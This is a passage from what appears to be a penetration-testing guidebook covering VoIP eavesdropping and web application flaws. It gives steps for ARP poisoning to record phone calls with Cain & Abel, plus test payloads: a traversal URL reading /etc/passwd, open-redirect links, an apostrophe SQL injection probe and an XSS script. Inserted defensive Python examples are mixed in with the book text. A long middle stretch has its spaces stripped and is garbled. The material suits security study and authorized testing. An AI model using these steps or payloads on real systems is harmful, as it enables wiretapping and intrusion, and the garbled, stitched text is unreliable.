If a VoIP network is not protected via network segmentation, such as a virtual local area network (VLAN), then the voice network is especially susceptible to eavesdropping, denial of service, and other attacks. But the VLAN barrier can be overcome in many environments by using a tool called VoIP Hopper (http://voiphopper.sourceforge.net). Just when you think your voice systems are secure, a tool like VoIP Hopper comes along. Gotta love innovation!

Unlike typical computer security vulnerabilities, these issues with VoIP aren’t easily fixed with simple software patches. These vulnerabilities are embedded into the Session Initiation Protocol (SIP) and Real-time Transport Protocol (RTP) that VoIP uses for its communications. The following are two VoIP-centric tests you should use to assess the security of your voice systems.

It’s important to note that although SIP is the most widely used VoIP protocol, there is H.323. So, don’t spin your wheels testing for SIP flaws if H.323 is the protocol in use. Refer to www.packetizer.com/ipmc/h323_vs_sip for additional details on H.323 versus SIP.

Scanning for vulnerabilities

Outside the basic network, OS, and web application vulnerabilities, you can uncover other VoIP issues if you use the right tools. The good news is that you likely already have these tools at your disposal in the form of network vulnerability scanners such as Nexpose (www.rapid7.com/products/nexpose) and web vulnerability scanners such as Netsparker (www.netsparker.com). Common flaws in the VoIP call managers and phones include weak passwords, cross-site scripting, and missing patches that can be exploited using a tool such as Metasploit.

Kali Linux has several VoIP tools built in via Applications/Vulnerability Analysis/VoIP Tools. Other free tools for analyzing SIP traffic are PROTOS (www.ee.oulu.fi/research/ouspg/protos/testing/c07/sip/index.html), and sipsak (www.voip-info.org/wiki/view/Sipsak). A good website that lists all sorts of VoIP tools is www.voipsa.org/Resources/tools.php.

Capturing and recording voice traffic

If you have access to the wired or wireless network, you can capture VoIP conversations easily. This is a great way to prove that the network and the VoIP installation are vulnerable. There are many legal issues associated with tapping into phone conversations, so make sure you have permission and are careful not to abuse your test results.

You can use Cain & Abel (technically just Cain for the features I demonstrate here) to tap into VoIP conversations. You can download Cain & Abel free at www.oxid.it/cain.html. Using Cain’s ARP poison routing feature, you can plug into the network and have it capture VoIP traffic:

1. Load Cain & Abel and then click the Sniffer tab to enter the network analyzer mode.

The Hosts page opens by default.

2. Click the Start/Stop APR icon (which looks like the nuclear waste symbol).

The ARP poison routing process starts and enables the built-in sniffer.

3. Click the blue + icon to add hosts to perform ARP poisoning on.

4. In the MAC Address Scanner window that appears, ensure that All Hosts in My Subnet is selected and then click OK.

5. Click the APR tab (the one with the yellow-and-black circle icon) to load the APR page.

6. Click the white space under the uppermost Status column heading (just under the Sniffer tab).

This step re-enables the blue + icon.

7. Click the blue + icon and the New ARP Poison Routing window shows the hosts discovered in Step 3.

8. Select your default route or other host that you want to capture packets traveling to and from.

I just select my default route, but you might consider selecting your SIP management system or other central VoIP system. The right column fills with all the remaining hosts.

9. In the right column, Ctrl+click the system you want to poison to capture its voice traffic.

In my case, I select my VoIP network adapter, but you might consider selecting all your VoIP phones.

10. Click OK to start the ARP poisoning process.

This process can take anywhere from a few seconds to a few minutes depending on your network hardware and each host’s local TCP/IP stack.

11. Click the VoIP tab and all voice conversations are “automagically” recorded.

Here’s the interesting part—the conversations are saved in .wav audio file format, so you simply right-click the recorded conversation you want to test and choose Play, as shown in Figure 14-13. Note that conversations being recorded show Recording… in the Status column.

Figure 14-13: Using Cain & Abel to capture, record, and play back VoIP conversations.

The voice quality with Cain and other tools depends on the codec your VoIP devices use. With my equipment, I find the quality is marginal at best. That’s not really a big deal, though, because your goal is to prove there’s a vulnerability—not to listen in on other people’s conversations.

There’s also a Linux-based tool called vomit (http://vomit.xtdnet.nl)—short for voice over misconfigured Internet telephones—that you can use to convert VoIP conversations into .wav files. You first need to capture the actual conversation by using tcpdump, but if Linux is your preference, this solution offers basically the same results as Cain, outlined in the preceding steps.

If you’re going to work a lot with VoIP, I highly recommend you invest in a good VoIP network analyzer. Check out WildPackets’ OmniPeek—a great all-in-one wired and wireless analyzer (www.savvius.com/products/overview/omnipeek_family/omnipeek_network_analysis)—and TamoSoft’s CommView (www.tamos.com/products/commview), which is a great low-priced alternative.

These VoIP vulnerabilities are only the tip of the iceberg. New systems, software, and related protocols continue to emerge, so it pays to remain vigilant, helping to ensure your conversations are locked down from those with malicious intent. Like I’ve said before, if it has an IP address or a URL, it’s fair game for attack.

Countermeasures against VoIP vulnerabilities

Locking down VoIP can be tricky. You can get off to a good start, though, by segmenting your voice network into its own VLAN—or even a dedicated physical network if that fits into your budget. Further isolate any Internet-connected systems so that not just anyone can connect to them (I see this often). You should also make sure that all VoIP-related systems are hardened according to vendor recommendations and widely accepted best practices (such as NIST’s SP 800-58 document at http://csrc.nist.gov/publications/nistpubs/800-58/SP800-58-final.pdf) and that software and firmware are patched on a periodic and consistent basis.

Chapter 15

Web Applications and Mobile Apps

In This Chapter

Testing websites and web applications

Uncovering flaws in mobile apps

Protecting against SQL injection and cross-site scripting

Preventing login weaknesses

Manually analyzing software flaws

Countering web abuse

Analyzing source code

Websites and web applications are common targets for attack because they’re everywhere and often open for anyone to poke and prod. Basic websites used for marketing, contact information, document downloads, and so on are especially easy for the bad guys to play around with. Commonly-used web platforms such as WordPress and related content management systems are especially vulnerable to attack because of their presence and lack of testing and patching. For criminal hackers, websites that provide a front end to complex applications and databases that store valuable information, such as credit card and Social Security numbers, are especially attractive. This is where the money is, both literally and figuratively.

Why are websites and applications so vulnerable? The consensus is that they’re vulnerable because of poor software development and testing practices. Sound familiar? It should; this same problem affects operating systems and practically all aspects of computer systems, including automobiles and related Internet of Things (IoT) systems. This is the side effect of relying on software compilers to perform error checking, questionable user demand for higher-quality software, and emphasizing time-to-market and usability over security.

This chapter presents security tests to run on your websites, applications, and mobile apps. Given all the custom configuration possibilities and system complexities, you can test for literally thousands of software vulnerabilities. In this chapter, I focus on the ones I see most often using both automated scanners and manual analysis. I also outline countermeasures to help minimize the chances that someone with ill intent can carry out these attacks against what are likely considered your most critical business systems.

I want to point out that this chapter merely skims the surface of all possible software security flaws and ways to test for them. Additional sources for building your web security testing skills are the tools and standards, such as the Top 10 Web Application Security Risks and Top 10 Mobile Risks, provided by the Open Web Application Security Project (www.owasp.org).

Choosing Your Web Security Testing Tools

Good web security testing tools can help ensure that you get the most from your work. As with many things in life, I find that you get what you pay for when it comes to testing for web security holes. This is why I mostly use commercial tools in my work when testing websites and web applications for vulnerabilities.

These are my favorite web security testing tools:

Acunetix Web Vulnerability Scanner (www.acunetix.com) for all-in-one security testing, including a port scanner and an HTTP sniffer

AppSpider (www.rapid7.com/products/appspider) for all-in-one security testing including excellent capabilities for authenticated scanning

Netsparker (www.netsparker.com) for all-in-one security testing that often uncovers vulnerabilities the other tools do not

Web Developer (http://chrispederick.com/work/web-developer) for manual analysis and manipulation of web pages

Yes, you must do manual analysis. You definitely want to use a scanner, because scanners find around half of the issues. For the other half, you need to do much more than just run automated scanning tools. Remember that you have to pick up where scanners leave off to truly assess the overall security of your websites and applications. You have to do some manual work not because web vulnerability scanners are faulty, but because poking and prodding web systems simply require good old-fashioned hacker trickery and your favorite web browser.

You can also use general vulnerability scanners, such as Nexpose and LanGuard, as well as exploit tools, such as Metasploit, when testing websites and applications. You can use these tools to find (and exploit) weaknesses at the web server level that you might not otherwise find with standard web-scanning tools and manual analysis. Google can be beneficial for rooting through web applications and looking for sensitive information as well. Although these non–application-specific tools can be beneficial, it’s important to know that they won’t drill down as deep as the tools I mention in the preceding list.

Seeking Out Web Vulnerabilities

Attacks against vulnerable websites and applications via Hypertext Transfer Protocol (HTTP) make up the majority of all Internet-related attacks. Most of these attacks can be carried out even if the HTTP traffic is encrypted (via HTTPS, also known as HTTP over SSL/TLS) because the communications medium has nothing to do with these attacks. The security vulnerabilities actually lie within the websites and applications themselves or the web server and browser software that the systems run on and communicate with.

Many attacks against websites and applications are just minor nuisances and might not affect sensitive information or system availability. However, some attacks can wreak havoc on your systems, putting sensitive information at risk and even placing your organization out of compliance with state, federal, and international information privacy and security laws and regulations.

Manual analysis required

It cannot be stressed enough how important it is to perform manual analysis of websites and applications using a good, old-fashioned web browser. You most certainly can’t live without web vulnerability scanners, but you better not depend on them to find everything because they won’t. Common web security vulnerabilities that you must check for include:

Specific password requirements including whether or not complexity is enforced

Whether or not intruder lockout works after so many failed login attempts

Whether or not encryption (ideally Transport Layer Security [TLS] Version 1.2) is used to protect user sessions, especially logins

User session handling including confirming that session cookies are changed after login and logout and whether or not sessions time out after a reasonable period of time

File upload capabilities and whether malware can be uploaded to the system

You don’t necessarily have to perform manual analysis of your websites and applications every time you test, but you need to do it periodically—at least once or twice a year. Don’t let anyone tell you otherwise!

Directory traversal

I start you out with a simple directory traversal attack. Directory traversal is a really basic weakness, but it can turn up interesting—sometimes sensitive—information about a web system. This attack involves browsing a site and looking for clues about the server’s directory structure and sensitive files that might have been loaded intentionally or unintentionally.

Perform the following tests to determine information about your website’s directory structure.

Crawlers

A spider program, such as the free HTTrack Website Copier (https://httrack.com), can crawl your site to look for every publicly accessible file. To use HTTrack, simply load it, give your project a name, tell HTTrack which website(s)to mirror, and after a few minutes, possibly hours (depending on the size and complexity of the site), you’ll have everything that’s publicly accessible on the site stored on your local drive in c:\My Web Sites. Figure 15-1 shows the crawl output of a basic website.

Figure 15-1: Using HTTrack to crawl a website.

Complicated sites often reveal a lot more information that should not be there, including old data files and even application scripts and source code.

Inevitably, when performing web security assessments, I stumble across .zip or .rar files on web servers. Sometimes they contain junk, but oftentimes they hold sensitive information that shouldn’t be there for the public to access. One project in particular stands out. When I ran across a .zip file and tried to open it, WinZip asked me for a password. Using my handy dandy .zip file password-cracking tool from ElcomSoft (see Chapter 8 for details on password cracking), I had the password in mere milliseconds. Inside the .zip file was an Excel spreadsheet containing sensitive patient healthcare information (names, addresses, Social Security numbers, and more) that anyone and everyone in the world could access. In situations like this, your business might be required to notify everyone involved that their information was inadequately protected and possibly compromised. It pays to know the laws and regulations affecting your business. Better yet, make sure users aren’t posting improperly secured sensitive information on your web servers in the first place!

Look at the output of your crawling program to see what files are available. Regular HTML and PDF files are probably okay because they’re most likely needed for normal web usage. But it wouldn’t hurt to open each file to make sure it belongs there and doesn’t contain sensitive information you don’t want to share with the world.
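A way to work through a crawl's file list systematically, as an added Python example that is not from the book or from HTTrack: the URL list is constructed, and the extension and file-name tables are a starting point of my own rather than any standard. It sorts the mirrored paths into the categories worth opening by hand (archives, backups, dumps, exports, includes, logs, and version-control or configuration files) and leaves ordinary pages and assets alone.

```python
"""Added example (not from the book): triage a crawler's file list for things that should
not be reachable from the web. The URLs and the category tables are constructed."""
from pathlib import PurePosixPath
from urllib.parse import urlparse

# Constructed list of URLs as a spider might have mirrored them (not Figure 15-1's data).
SAMPLE_CRAWL = [
    "https://www.example.com/",
    "https://www.example.com/index.html",
    "https://www.example.com/about/",
    "https://www.example.com/docs/brochure.pdf",
    "https://www.example.com/css/site.css",
    "https://www.example.com/backup/site-2015.zip",
    "https://www.example.com/data/patients.xlsx",
    "https://www.example.com/includes/db.inc",
    "https://www.example.com/index.php.bak",
    "https://www.example.com/.git/config",
    "https://www.example.com/logs/error.log",
    "https://www.example.com/export/customers.sql.gz",
]

# Extensions worth opening by hand (assumed starting point, extend for your environment).
RISKY_EXTENSIONS = {
    ".zip": "archive", ".rar": "archive", ".7z": "archive", ".tar": "archive", ".gz": "archive",
    ".bak": "backup copy", ".old": "backup copy", ".orig": "backup copy", ".swp": "backup copy",
    ".sql": "database dump", ".mdb": "database file", ".sqlite": "database file",
    ".xls": "data export", ".xlsx": "data export", ".csv": "data export",
    ".inc": "source or include file", ".config": "configuration", ".ini": "configuration",
    ".log": "log file",
}
# Extensions a site normally needs to function.
BENIGN_EXTENSIONS = {".html", ".htm", ".pdf", ".css", ".js", ".png", ".jpg", ".jpeg",
                     ".gif", ".svg", ".ico", ".woff", ".woff2"}
# Names (files or directories) that are sensitive whatever their extension.
SENSITIVE_NAMES = {".git", ".svn", ".env", ".htpasswd", "web.config", "phpinfo.php"}


def classify_url(url):
    """Return a category for a URL that deserves a look, or None if it looks benign."""
    path = PurePosixPath(urlparse(url).path)
    parts = {p.lower() for p in path.parts}
    if parts & SENSITIVE_NAMES:
        return "sensitive file or directory"
    suffixes = [s.lower() for s in path.suffixes]   # "customers.sql.gz" -> [".sql", ".gz"]
    if not suffixes:                                # a directory or an extension-less page
        return None
    for suffix in suffixes:                         # most specific type first: .sql beats .gz
        if suffix in RISKY_EXTENSIONS:
            return RISKY_EXTENSIONS[suffix]
    if suffixes[-1] in BENIGN_EXTENSIONS:
        return None
    return "unrecognized type, review by hand"


def triage(urls):
    """Group flagged URLs by category, in the order each category was first seen."""
    report = {}
    for url in urls:
        category = classify_url(url)
        if category:
            report.setdefault(category, []).append(url)
    return report


if __name__ == "__main__":
    for category, urls in triage(SAMPLE_CRAWL).items():
        print(category)
        for url in urls:
            print("   ", url)
```

Anything it flags still has to be opened and judged, as the text says; the value of a pass like this is that the .zip, .bak and dump files never get lost in a list of thousands of ordinary pages, and that anything of an unfamiliar type is called out rather than silently skipped.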

Google

Google, the search engine company that many love to hate, can also be used for directory traversal. In fact, Google’s advanced queries are so powerful that you can use them to root out sensitive information, critical web server files and directories, credit card numbers, webcams—basically anything that Google has discovered on your site—without having to mirror your site and sift through everything manually. It’s already sitting there in Google’s cache waiting to be viewed.

The following are a couple of advanced Google queries that you can enter directly into the Google search field:

site:hostname keywords—This query searches for any keyword you list, such as SSN, confidential, credit card, and so on. An example would be:

site:www.principlelogic.com speaker

filetype:file-extension site:hostname—This query searches for specific file types on a specific website, such as doc, pdf, db, dbf, zip, and more. These file types might contain sensitive information. An example would be:

filetype:pdf site:www.principlelogic.com

Other advanced Google operators include the following:

allintitle searches for keywords in the title of a web page.

inurl searches for keywords in the URL of a web page.

related finds pages similar to this web page.

link shows other sites that link to this web page.

Specific definitions and more can be found at www.googleguide.com/advanced_operators.html. Many web vulnerability scanners also perform checks against the Google Hacking Database (GHDB) site www.exploit-db.com/google-hacking-database.

When sifting through your site with Google, be sure to look for sensitive information about your servers, network, and organization in Google Groups (http://groups.google.com), which is the Usenet archive. I have found employee postings in newsgroups that reveal too much about the internal network and business systems—the sky is the limit. If you find something that doesn’t need to be there, you can work with Google to have it edited or removed. For more information, refer to Google’s Contact us page at www.google.com/intl/en/contact.

Looking at the bigger picture of web security, Google hacking is pretty limited, but if you’re really into it, check out Johnny Long’s book, Google Hacking for Penetration Testers (Syngress).

Countermeasures against directory traversals

You can employ three main countermeasures against having files compromised via malicious directory traversals:

Don’t store old, sensitive, or otherwise nonpublic files on your web server. The only files that should be in your /htdocs or DocumentRoot folder are those that are needed for the site to function properly. These files should not contain confidential information that you don’t want the world to see.

Configure your robots.txt file to prevent search engines, such as Google, from crawling the more sensitive areas of your site.

Ensurethatyourwebserverisproperlyconfiguredtoallowpublicaccesstoonlythosedirectoriesthatareneededforthesitetofunction.Minimumprivilegesarekeyhere,soprovideaccesstoonlythefilesanddirectoriesneededforthewebapplicationtoperformproperly.

Checkyourwebserver’sdocumentationforinstructionsoncontrollingpublicaccess.Dependingonyourwebserverversion,theseaccesscontrolsaresetin

Thehttpd.conffileandthe.htaccessfilesforApache(Seehttp://httpd.apache.org/docs/current/configuring.htmlformoreinformation.)InternetInformationServicesManagerforIIS

Thelatestversionsofthesewebservershavegooddirectorysecuritybydefaultso,ifpossible,makesureyou’rerunningthelatestversions.

Finally,considerusingasearchenginehoneypot,suchastheGoogleHackHoneypot(http://ghh.sourceforge.net).Ahoneypotdrawsinmalicioususerssoyoucanseehowthebadguysareworkingagainstyoursite.Then,youcanusetheknowledgeyougaintokeepthematbay.

Input-filteringattacksWebsitesandapplicationsarenotoriousfortakingpracticallyanytypeofinput,mistakenlyassumingthatit’svalid,andprocessingitfurther.Notvalidatinginputisoneofthegreatestmistakesthatwebdeveloperscanmake.

Severalattacksthatinsertmalformeddata—often,toomuchatonetime—canberunagainstawebsiteorapplication,whichcanconfusethesystemandmakeitdivulgetoomuchinformationtotheattacker.Inputattackscanalsomakeiteasyforthebadguystogleansensitiveinformationfromthewebbrowsersofunsuspectingusers.

BufferoverflowsOneofthemostseriousinputattacksisabufferoverflowthatspecificallytargetsinputfieldsinwebapplications.

Forinstance,acredit-reportingapplicationmightauthenticateusersbeforethey’reallowedtosubmitdataorpullreports.TheloginformusesthefollowingcodetograbuserIDswithamaximuminputof12characters,asdenotedbythemaxsizevariable:

<formname="Webauthenticate"action="www.your_web_app.com/

login.cgi"method="POST">

<inputtype="text"name="inputname"maxsize="12">

Atypicalloginsessionwouldinvolveavalidloginnameof12charactersorfewer.However,themaxsizevariablecanbechangedtosomethinghuge,suchas100oreven1,000.Thenanattackercanenterbogusdataintheloginfield.Whathappensnextisanyone’scall—theapplicationmighthang,overwriteotherdatainmemory,orcrashtheserver.

Asimplewaytomanipulatesuchavariableistostepthroughthepagesubmissionbyusingawebproxy,suchasthosebuiltintothecommercialwebvulnerabilityscannersImentionorthefreeBurpProxy(https://portswigger.net/burp/proxy.html).

Webproxiessitbetweenyourwebbrowserandtheserveryou’retestingandallowyoutomanipulateinformationsenttotheserver.Tobegin,youmustconfigureyourwebbrowsertousethelocalproxyof127.0.0.1onport8080.ToaccessthisinFirefox,chooseOptions,clickAdvanced,clicktheNetworktab,clicktheConnectionSettingsbutton,andthenselecttheManualProxyConfigurationradiobutton.InInternetExplorer,choosetheGearicon ⇒ InternetOptions,thenclicktheLANSettingsbuttonunderConnections,selecttheUseaproxyserverforyourLANradiobutton,andentertheappropriatehostname/IPaddressandportnumber.

Allyouhavetodoischangethefieldlengthofthevariablebeforeyourbrowsersubmitsthepage,anditwillbesubmittedusingwhateverlengthyougive.YoucanalsousetheWebDevelopertoremovemaximumformlengthsdefinedinwebforms,asshowninFigure15-2.

Figure15-2:UsingFirefoxWebDevelopertoresetformfieldlengths.

URLmanipulationAnautomatedinputattackmanipulatesaURLandsendsitbacktotheserver,tellingthewebapplicationtodovariousthings,suchasredirecttothird-partysites,loadsensitivefilesofftheserver,andsoon.Localfileinclusionisonesuchvulnerability.ThisiswhenthewebapplicationacceptsURL-basedinputandreturnsthespecifiedfile’scontentstotheusersuchasinthefollowingexampleofanattemptedbreachofaLinuxserver’spasswdfile:

https://www.your_web_app.com/onlineserv/Checkout.cgi?state=

detail&language=english&imageSet=/../..//../..//../..//../

..///etc/passwd

It’simportanttonotethatmostrecentapplicationplatformssuchasASP.NETandJavaareprettygoodaboutnotallowingsuchmanipulationoftheURLvariables,butIdostillseethisvulnerabilityperiodically.

ThefollowinglinksdemonstrateanotherexampleofURLtrickerycalledURLredirection:

http://www.your_web_app.com/error.aspx?URL=http://www.

bad~site.com&ERROR=Path+’OPTIONS’+is+forbidden.

http://www.your_web_app.com/exit.asp?URL=http://www.

bad~site.com

Inbothsituations,anattackercanexploitthisvulnerabilitybysendingthelinktounsuspectingusersviae-mailorbypostingitonawebsite.Whenusersclickthelink,theycanberedirectedtoamaliciousthird-partysitecontainingmalwareorinappropriatematerial.

Ifyouhavenothingbuttimeonyourhands,youmightuncoverthesetypesofvulnerabilitiesmanually.However,intheinterestofaccuracy(andsanity),theseattacksarebestcarriedoutbyrunningawebvulnerabilityscannerbecausetheycandetecttheweaknessbysendinghundredsandhundredsofURLiterationstothewebsystemveryquickly.
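The two URL-manipulation cases above (a traversal path in the imageSet parameter and an attacker-supplied URL redirect parameter) are both fixed on the server side by refusing to act on the raw value. This is an added example, not code from the book: the document root is a throwaway directory built by make_demo_root(), and the function names and the allow-listed host are hypothetical.

```python
# Added example (not from the book): server-side checks for the two
# URL-manipulation cases above. Names and the allow-listed host are hypothetical.
import os
import tempfile
from urllib.parse import unquote, urlsplit

DOC_ROOT = None  # set by make_demo_root()


def make_demo_root():
    """Build a throwaway document root holding one legitimate image file."""
    global DOC_ROOT
    DOC_ROOT = tempfile.mkdtemp(prefix="docroot-")
    os.makedirs(os.path.join(DOC_ROOT, "images"))
    with open(os.path.join(DOC_ROOT, "images", "logo.gif"), "wb") as fh:
        fh.write(b"GIF89a")  # constructed placeholder content
    return DOC_ROOT


def resolve_under_root(root, requested):
    """Return the absolute path for `requested` only if it stays under root.

    The decision is made on the *resolved* path rather than by searching the
    string for '../', so doubled slashes, percent-encoding and absolute paths
    such as /etc/passwd are all caught by the same check.
    """
    cleaned = unquote(requested).lstrip("/")
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, cleaned))
    if os.path.commonpath([root_real, candidate]) != root_real:
        return None
    return candidate


def serve_image(image_set):
    """Hardened handling of the Checkout.cgi imageSet parameter from the text."""
    path = resolve_under_root(DOC_ROOT, image_set)
    if path is None or not os.path.isfile(path):
        return 404, b""
    with open(path, "rb") as fh:
        return 200, fh.read()


ALLOWED_REDIRECT_HOSTS = {"www.your_web_app.com"}  # hypothetical allow-list


def safe_redirect_target(url_param, default="/"):
    """Follow a redirect only to a local path or to an allow-listed host.

    Anything else (another host, a scheme-relative '//host' URL, a
    'javascript:' URL) falls back to the default landing page.
    """
    parts = urlsplit(url_param)
    is_local_path = (parts.scheme == "" and parts.netloc == ""
                     and url_param.startswith("/")
                     and not url_param.startswith("//"))
    if is_local_path:
        return url_param
    if parts.scheme in ("http", "https") and parts.hostname in ALLOWED_REDIRECT_HOSTS:
        return url_param
    return default
```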

Hidden field manipulation

Some websites and applications embed hidden fields within web pages to pass state information between the web server and the browser. Hidden fields are represented in a web form as <input type="hidden">. Because of poor coding practices, hidden fields often contain confidential information (such as product prices on an e-commerce site) that should be stored only in a back-end database. Users shouldn't see hidden fields — hence the name — but the curious attacker can discover and exploit them with these steps:

1. View the HTML source code.

To see the source code in Internet Explorer and Firefox, you can usually right-click on the page and select View source or View Page Source.

2. Change the information stored in these fields.

For example, a malicious user might change the price from $100 to $10.

3. Repost the page back to the server.

This step allows the attacker to obtain ill-gotten gains, such as a lower price on a web purchase.

Such vulnerabilities are becoming rare, but like URL manipulation, the possibility exists so it pays to keep an eye out.

Using hidden fields for authentication (login) mechanisms can be especially dangerous. I once came across a multifactor authentication intruder lockout process that relied on a hidden field to track the number of times the user attempted to log in. This variable could be reset to zero for each login attempt and thus facilitate a scripted dictionary or brute-force login attack. It was somewhat ironic that the security control to prevent intruder attacks was vulnerable to an intruder attack.

Several tools, such as the proxies that come with commercial web vulnerability scanners or Burp Proxy, can easily manipulate hidden fields. Figure 15-3 shows the WebInspect SPI Proxy interface and a web page's hidden field.

Figure 15-3: Using WebInspect to find and manipulate hidden fields.

If you come across hidden fields, you can try to manipulate them to see what can be done. It's as simple as that.
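The price and the login-attempt counter above are the two kinds of hidden-field state: one that should never leave the server, and one that may have to round-trip through the browser. This added example (not the book's code) shows the vulnerable checkout beside a server-side lookup, and an HMAC-signed hidden value for the counter case; the catalog, form values and signing key are constructed.

```python
# Added example (not from the book). CATALOG, the form dictionaries and SECRET
# are constructed demo values; function names are hypothetical.
import hashlib
import hmac

CATALOG = {"SKU-100": 100.00, "SKU-250": 250.00}  # server-side prices


def checkout_trusting_hidden_field(form):
    """Vulnerable: the total comes straight from <input type="hidden" name="price">,
    so the $100 -> $10 edit described above is simply honoured."""
    return float(form["price"]) * int(form["qty"])


def checkout_server_side(form):
    """Hardened: the browser says *what* and *how many*; the price is looked up.
    Returns None for an unknown SKU or a nonsensical quantity."""
    sku = form.get("sku")
    try:
        qty = int(form.get("qty", "0"))
    except ValueError:
        return None
    if sku not in CATALOG or qty < 1:
        return None
    return CATALOG[sku] * qty


# When a value genuinely must round-trip through the browser, sign it so a
# client-side edit is detected. Note the limit: a signature stops *edits*, not
# *replay* of an old signed value, so a server-side session counter is still
# the better home for something like a lockout count.
SECRET = b"constructed-demo-key-not-for-real-use"


def sign_hidden_value(name, value):
    """Return 'value.tag', where tag is an HMAC-SHA256 over both name and value."""
    tag = hmac.new(SECRET, f"{name}={value}".encode(), hashlib.sha256).hexdigest()
    return f"{value}.{tag}"


def verify_hidden_value(name, signed):
    """Return the original value if the tag checks out, otherwise None."""
    value, sep, tag = signed.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(SECRET, f"{name}={value}".encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        return None
    return value


def failed_attempts_from_form(form):
    """Read the signed attempt counter. A missing, unsigned or tampered field is
    treated as the maximum, so tampering triggers lockout instead of resetting it."""
    value = verify_hidden_value("attempts", form.get("attempts", ""))
    if value is None or not value.isdigit():
        return 999
    return int(value)
```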

Code injection and SQL injection

Similar to URL manipulation attacks, code-injection attacks manipulate specific system variables. Here's an example:

http://www.your_web_app.com/script.php?info_variable=X

Attackers who see this variable can start entering different data into the info_variable field, changing X to something like one of the following lines:

http://www.your_web_app.com/script.php?info_variable=Y

http://www.your_web_app.com/script.php?info_variable=123XYZ

This is a rudimentary example but, nonetheless, the web application might respond in a way that gives attackers more information than you want them to have, such as detailed errors or access into data fields they're not authorized to access. The invalid input might also cause the application or the server to hang. Similar to the case study earlier in the chapter, hackers can use this information to determine more about the web application and its inner workings, which can ultimately lead to a serious system compromise.

If HTTP variables are passed in the URL and are easily accessible, it's only a matter of time before someone exploits your web application.

I once used a web application to manage some personal information that did just this. Because a "name" parameter was part of the URL, anyone could gain access to other people's personal information by changing the "name" value. For example, if the URL included "name=kbeaver", a simple change to "name=jsmith" would bring up J. Smith's home address, Social Security number, and so on. Ouch! I alerted the system administrator to this vulnerability. After a few minutes of denial, he agreed that it was indeed a problem and proceeded to work with the developers to fix it.

Code injection can also be carried out against back-end SQL databases — an attack known as SQL injection. Malicious attackers insert SQL statements, such as CONNECT, SELECT, and UNION, into URL requests to attempt to connect and extract information from the SQL database that the web application interacts with. SQL injection is made possible by applications not properly validating input combined with informative errors returned from database servers and web servers.

Two general types of SQL injection are standard (also called error-based) and blind. Error-based SQL injection is exploited based on error messages returned from the application when invalid information is input into the system. Blind SQL injection happens when error messages are disabled, requiring the hacker or automated tool to guess what the database is returning and how it's responding to injection attacks.

There's a quick (although not as reliable as it used to be) way to determine whether your web application is vulnerable to SQL injection. Simply enter a single apostrophe (') in your web form fields or at the end of the URL. If a SQL error is returned, odds are good that SQL injection is present.

You're definitely going to get what you pay for when it comes to scanning for and uncovering SQL injection flaws with a web vulnerability scanner. As with URL manipulation, you're much better off running a web vulnerability scanner to check for SQL injection, which allows an attacker to inject database queries and commands through the vulnerable page to the backend database. Figure 15-4 shows numerous SQL injection vulnerabilities discovered by the Netsparker vulnerability scanner.

Figure 15-4: Netsparker discovered SQL injection vulnerabilities.

When you discover SQL injection vulnerabilities, you might be inclined to stop there and not try to exploit the weakness. That's fine. However, I prefer to see how far I can get into the database system. I recommend using any SQL injection capabilities built into your web vulnerability scanner if possible so you can demonstrate the flaw to management.

If your budget is limited, you may consider using a free SQL injection tool such as SQL Power Injector (www.sqlpowerinjector.com) or the Firefox Add-on, SQL Inject Me (https://addons.mozilla.org/en-us/firefox/addon/sql-inject-me).

I cover database security more in depth in Chapter 16.
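The single-apostrophe check above, run against a string-built query and against its parameterised replacement, plus the request handler that swallows the database error instead of reflecting it. This is an added example, not the book's code; the users table and its rows are constructed in an in-memory SQLite database.

```python
# Added example (not from the book): the apostrophe check against a vulnerable
# and a parameterised lookup. Table contents are constructed demo data.
import logging
import sqlite3

log = logging.getLogger("webapp")


def make_db():
    """In-memory SQLite database with a few constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, ssn TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [
        ("kbeaver", "000-00-0001"),   # constructed
        ("jsmith", "000-00-0002"),    # constructed
        ("o'brien", "000-00-0003"),   # a legitimate name containing an apostrophe
    ])
    return conn


def lookup_vulnerable(conn, name):
    """String-built query: whatever the user typed becomes part of the SQL text.
    A lone apostrophe unbalances the quotes and the database raises an error,
    which is exactly what the quick check above looks for."""
    sql = "SELECT name FROM users WHERE name = '%s'" % name
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterised(conn, name):
    """Bound parameter: the driver passes the text as data, never as SQL, so an
    apostrophe is just a character (and o'brien can actually be looked up)."""
    rows = conn.execute("SELECT name FROM users WHERE name = ?", (name,))
    return [row[0] for row in rows]


def apostrophe_check(lookup, conn):
    """Return 'error' if the lookup fails on a single apostrophe, else 'ok'."""
    try:
        lookup(conn, "'")
    except sqlite3.Error:
        return "error"
    return "ok"


def handle_request(conn, name):
    """What the page should send back: results, or a generic error. The database
    detail goes to the server log, never to the browser."""
    try:
        return {"status": 200, "rows": lookup_parameterised(conn, name)}
    except sqlite3.Error as exc:
        log.error("database error while looking up a user: %s", exc)
        return {"status": 500, "rows": [], "message": "An error occurred."}
```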

Cross-site scripting

Cross-site scripting (XSS) is perhaps the most well-known — and widespread — web vulnerability that occurs when a web page displays user input — typically via JavaScript — that isn't properly validated. A criminal hacker can take advantage of the absence of input filtering and cause a web page to execute malicious code on any user's computer that views the page.

For example, an XSS attack can display the user ID and password login page from another rogue website. If users unknowingly enter their user IDs and passwords in the login page, the user IDs and passwords are entered into the hacker's web server log file. Other malicious code can be sent to a victim's computer and run with the same security privileges as the web browser or e-mail application that's viewing it on the system; the malicious code could provide a hacker with full Read/Write access to browser cookies, browser history files, or even permit the download/installation of malware.

A simple test shows whether your web application is vulnerable to XSS. Look for any fields in the application that accept user input (such as on a login or search form), and enter the following JavaScript statement:

<script>alert('XSS')</script>

If a window pops up that reads XSS, as shown in Figure 15-5, the application is vulnerable. The XSS-Me Firefox Add-on (https://addons.mozilla.org/en-US/firefox/addon/xss-me/) is a novel way to test for this vulnerability as well.

Figure 15-5: Script code reflected to the browser.

There are many more iterations for exploiting XSS, such as those requiring user interaction via the JavaScript onmouseover event handler. As with SQL injection, you really need to use an automated scanner to check for XSS. Both Netsparker and Acunetix Web Vulnerability Scanner do a great job of finding XSS. However, they often tend to find different XSS issues, a detail that highlights the importance of using multiple scanners when you can. Figure 15-6 shows some sample XSS findings in Acunetix Web Vulnerability Scanner.

